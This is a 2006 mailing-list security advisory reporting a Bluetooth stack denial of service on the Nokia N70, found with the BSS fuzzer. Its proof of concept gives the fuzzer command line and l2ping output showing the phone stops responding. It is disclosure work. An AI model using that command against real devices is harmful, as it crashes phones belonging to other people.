[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <43ED10ED.90005@infratech.fr>
Date: Fri Feb 10 22:17:29 2006
From: research at infratech.fr (Infratech Research)
Subject: [ Secuobs - Advisory ] Bluetooth : DoS on Nokia
cell phones
[Software affected] Bluetooth Stack on Nokia cell phones
[Version] Nokia N70 and maybe other models
[Impact] Denial of Service on Bluetooth Stack (maybe more) - Message "System Error" - Phone DoS (shutdown)
[Credits] Pierre Betouin - pierre.betouin@...ratech.fr - Bug found with BSS v0.6 GPL fuzzer (Bluetooh Stack Smasher - Linux)
BSS could be downloaded on http://www.secuobs.com/news/05022006-bluetooth10.shtml
[Vendor] notified now
[Original advisory]
http://www.secuobs.com/news/10022006-nokia_n70.shtml#english
http://www.secuobs.com/news/10022006-nokia_n70.shtml#french
[Proof of Concept]
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss
# ./bss -m 12 -s 1000 00:15:A0:XX:XX:XX
(... snip ...)
# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:80:37:ZZ:ZZ:ZZ id 0
1 sent, 0 received, 100% loss
Powered by blists - more mailing lists